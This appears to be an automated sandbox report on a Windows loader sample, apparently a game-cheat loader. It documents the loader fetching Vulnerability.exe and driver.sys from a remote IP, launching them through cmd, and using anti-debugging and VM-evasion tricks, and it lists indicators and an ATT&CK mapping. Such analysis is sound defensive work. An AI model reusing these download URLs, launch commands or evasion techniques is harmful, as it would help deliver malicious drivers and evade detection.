Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: Iyto7FYCJO.exeStatic PE information: section name: _RDATA
Source: Iyto7FYCJO.exeStatic PE information: section name: .vmp0
Source: Iyto7FYCJO.exeStatic PE information: section name: .vmp1

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\Vulnerability.exeJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sysJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Windows\driver.sysJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Windows\Vulnerability.exeJump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exeJump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sysJump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Windows\driver.sysJump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Windows\Vulnerability.exeJump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeFile created: C:\Windows\driver.sysJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeMemory written: PID: 1308 base: 7FF8C8A50008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeMemory written: PID: 1308 base: 7FF8C88ED9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeMemory written: PID: 1308 base: 7FF8C8A6000D value: E9 BB CB EB FF Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeMemory written: PID: 1308 base: 7FF8C891CBC0 value: E9 5A 34 14 00 Jump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeRDTSC instruction interceptor: First address: 7FF7A3036BA4 second address: 7FF7A3036BAD instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeRDTSC instruction interceptor: First address: 7FF7A300CFB8 second address: 7FF7A308E2DA instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 23360512h 0x00000008 call 00007F93C8DCC21Ch 0x0000000d inc ecx 0x0000000e push edi 0x0000000f jmp 00007F93C8E1CC87h 0x00000014 inc ecx 0x00000015 push ebx 0x00000016 pushfd 0x00000017 dec ecx 0x00000018 rcr ebx, cl 0x0000001a push eax 0x0000001b inc ecx 0x0000001c bt ebx, FFFFFFF4h 0x00000020 inc bp 0x00000022 bts ebx, ebp 0x00000025 inc ecx 0x00000026 push ebp 0x00000027 inc ecx 0x00000028 shr bl, cl 0x0000002a xchg al, ah 0x0000002c rcr ah, FFFFFF99h 0x0000002f inc ecx 0x00000030 push edx 0x00000031 inc bp 0x00000033 movsx ebx, cl 0x00000036 bswap eax 0x00000038 push ebx 0x00000039 inc esp 0x0000003a mov ebx, edi 0x0000003c push edx 0x0000003d inc sp 0x0000003f btr eax, esi 0x00000042 btc ax, FFE0h 0x00000047 inc cx 0x00000049 sar ebx, 6Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e inc ecx 0x0000004f xor bl, FFFFFFB7h 0x00000052 push ebp 0x00000053 inc eax 0x00000054 rol ch, 00000007h 0x00000057 push ecx 0x00000058 dec ebp 0x00000059 test edi, ebx 0x0000005b push esi 0x0000005c push edi 0x0000005d bsf di, sp 0x00000061 inc ebp 0x00000062 cmp ch, ch 0x00000064 inc ecx 0x00000065 shr bl, cl 0x00000067 inc ecx 0x00000068 push eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeRDTSC instruction interceptor: First address: 7FF7A2B4D305 second address: 7FF7A2B4D335 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 00000043h 0x00000005 inc ecx 0x00000006 pop edx 0x00000007 inc cx 0x00000009 bt ebx, ecx 0x0000000c inc ecx 0x0000000d pop ebx 0x0000000e sal bl, cl 0x00000010 pop ebp 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 and esp, 7E967785h 0x0000001c dec esp 0x0000001d test edx, esp 0x0000001f inc ecx 0x00000020 pop ebp 0x00000021 inc cx 0x00000023 xor eax, 5C410F04h 0x00000029 dec eax 0x0000002a bt eax, 0Fh 0x0000002e cbw 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeRDTSC instruction interceptor: First address: 7FF7A2B613F1 second address: 7FF7A2B613FA instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSpecial instruction interceptor: First address: 7FF7A300CFA0 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSpecial instruction interceptor: First address: 7FF7A300CFB8 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,5_2_00007FF7738F14C0
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sysJump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeDropped PE file which has not been started: C:\Windows\driver.sysJump to dropped file
Source: C:\Windows\Vulnerability.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\timeout.exe TID: 2300Thread sleep count: 38 > 30Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F3B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,5_2_00007FF7738F3B60
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@SH
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWfonsjX
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeHandle closed: DEADC0DE
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7738F4B58
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,5_2_00007FF7738F14C0
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F1630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F4D00 SetUnhandledExceptionFilter,5_2_00007FF7738F4D00
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F43B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7738F43B8
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7738F4B58

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeNtProtectVirtualMemory: Indirect: 0x7FF7A2B8EF62Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sysJump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 | find /i /v "md5" | find /i /v "certutil"Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sysJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
Source: C:\Windows\Vulnerability.exeCode function: GetLocaleInfoEx,FormatMessageA,5_2_00007FF7738F38A8
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F4D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00007FF7738F4D6C
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Windows Service
1
Exploitation for Privilege Escalation
121
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
12
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
Windows Service
12
Virtualization/Sandbox Evasion
11
Input Capture
531
Security Software Discovery
Remote Desktop Protocol11
Input Capture
11
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Process Injection
11
Process Injection
Security Account Manager12
Virtualization/Sandbox Evasion
SMB/Windows Admin Shares11
Archive Collected Data
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
1
Deobfuscate/Decode Files or Information
NTDS2
Process Discovery
Distributed Component Object ModelInput Capture23
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials223
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538236 Sample: Iyto7FYCJO.exe Startdate: 20/10/2024 Architecture: WINDOWS Score: 100 48 keyauth.win 2->48 56 Antivirus / Scanner detection for submitted sample 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 4 other signatures 2->62 9 Iyto7FYCJO.exe 17 2->9         started        signatures3 process4 dnsIp5 50 185.101.104.122, 49704, 80 HOSTCLEAN-SRLRO Romania 9->50 52 keyauth.win 172.67.72.57, 443, 49710 CLOUDFLARENETUS United States 9->52 54 127.0.0.1 unknown unknown 9->54 40 C:\Windows\driver.sys, PE32+ 9->40 dropped 42 C:\Windows\Vulnerability.exe, PE32+ 9->42 dropped 44 C:\Users\user\...\Vulnerability[1].exe, PE32+ 9->44 dropped 46 C:\Users\user\AppData\Local\...\driver[1].sys, PE32+ 9->46 dropped 70 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->70 72 Sample is not signed and drops a device driver 9->72 74 Tries to evade analysis by execution special instruction (VM detection) 9->74 76 4 other signatures 9->76 14 cmd.exe 1 9->14         started        17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        21 3 other processes 9->21 file6 signatures7 process8 signatures9 78 Drops executables to the windows directory (C:\Windows) and starts them 14->78 23 Vulnerability.exe 14 14->23         started        26 certutil.exe 3 1 17->26         started        28 find.exe 1 17->28         started        30 find.exe 1 17->30         started        32 cmd.exe 1 19->32         started        process10 signatures11 64 Multi AV Scanner detection for dropped file 23->64 66 Accesses win32k, likely to find offsets for exploits 23->66 68 Machine Learning detection for dropped file 23->68 34 conhost.exe 23->34         started        36 conhost.exe 32->36         started        38 timeout.exe 1 32->38         started        process12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Iyto7FYCJO.exe42%ReversingLabsWin64.Trojan.Generic
Iyto7FYCJO.exe100%AviraHEUR/AGEN.1315472
Iyto7FYCJO.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe100%Joe Sandbox ML
C:\Windows\Vulnerability.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys62%ReversingLabsWin64.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe55%ReversingLabsWin64.Trojan.Dacic
C:\Windows\Vulnerability.exe55%ReversingLabsWin64.Trojan.Dacic
C:\Windows\driver.sys62%ReversingLabsWin64.Trojan.Generic
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://curl.haxx.se/docs/http-cookies.html0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
keyauth.win
172.67.72.57
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://185.101.104.122/Vulnerability.exefalse
      unknown
      http://185.101.104.122/driver.sysfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://185.101.104.122/driver.syslIyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmpfalse
            unknown
            http://185.101.104.122/Vulnerability.exevIyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://www.behance.net/madetypeFreeIyto7FYCJO.exe, 00000000.00000002.2223557132.00007FF7A27F2000.00000004.00000001.01000000.00000003.sdmpfalse
                unknown
                http://185.101.104.122/driver.sysWIyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://185.101.104.122/driver.sysC:Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.101.104.122/Vulnerability.exeC:Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://keyauth.win/api/1.2/2(fIyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://185.101.104.122/driver.syseIyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://curl.haxx.se/docs/http-cookies.htmlIyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://keyauth.win/api/1.2/Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://185.101.104.122/Vulnerability.exeC9?Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              172.67.72.57
                              keyauth.winUnited States
                              13335CLOUDFLARENETUSfalse
                              185.101.104.122
                              unknownRomania
                              57673HOSTCLEAN-SRLROfalse
                              IP
                              127.0.0.1
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1538236
                              Start date and time:2024-10-20 21:14:08 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 10s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Iyto7FYCJO.exe
                              renamed because original name is a hash value
                              Original Sample Name:e12627a292cf6a7d32adb932adbd2b3b.exe
                              Detection:MAL
                              Classification:mal100.expl.evad.winEXE@25/5@1/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 15
                              • Number of non-executed functions: 76
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 204.79.197.219
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, a-0016.a-msedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, msdl-microsoft-com.a-0016.a-msedge.net, msdl.microsoft.akadns.net, ctldl.windowsupdate.com, msdl.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: Iyto7FYCJO.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              172.67.72.57SecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exeGet hashmaliciousUnknownBrowse
                                SecuriteInfo.com.Variant.Tedy.640280.26081.14300.exeGet hashmaliciousUnknownBrowse
                                  fox vanguard bypass.exeGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.Win64.DropperX-gen.8867.28776.exeGet hashmaliciousUnknownBrowse
                                      SecuriteInfo.com.W64.GenKryptik.GHEK.tr.28454.21428.exeGet hashmaliciousUnknownBrowse
                                        SecuriteInfo.com.Trojan.MulDrop28.40.18458.1049.exeGet hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.Trojan.MulDrop28.40.18458.1049.exeGet hashmaliciousUnknownBrowse
                                            aj.exeGet hashmaliciousUnknownBrowse
                                              Loader (3).exeGet hashmaliciousUnknownBrowse
                                                yHMIXSIJiH.exeGet hashmaliciousUnknownBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  keyauth.winG9e272AEyo.exeGet hashmaliciousUnknownBrowse
                                                  • 104.26.1.5
                                                  oMBUxRQ4cj.exeGet hashmaliciousUnknownBrowse
                                                  • 104.26.0.5
                                                  SecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exeGet hashmaliciousUnknownBrowse
                                                  • 172.67.72.57
                                                  SecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exeGet hashmaliciousUnknownBrowse
                                                  • 104.26.0.5
                                                  SecuriteInfo.com.Win64.Evo-gen.20301.32747.exeGet hashmaliciousUnknownBrowse
                                                  • 104.26.0.5
                                                  SecuriteInfo.com.Win64.MalwareX-gen.32411.29244.exeGet hashmaliciousUnknownBrowse
                                                  • 104.26.0.5
                                                  Frozen_Slotted.exeGet hashmaliciousUnknownBrowse
                                                  • 104.26.1.5
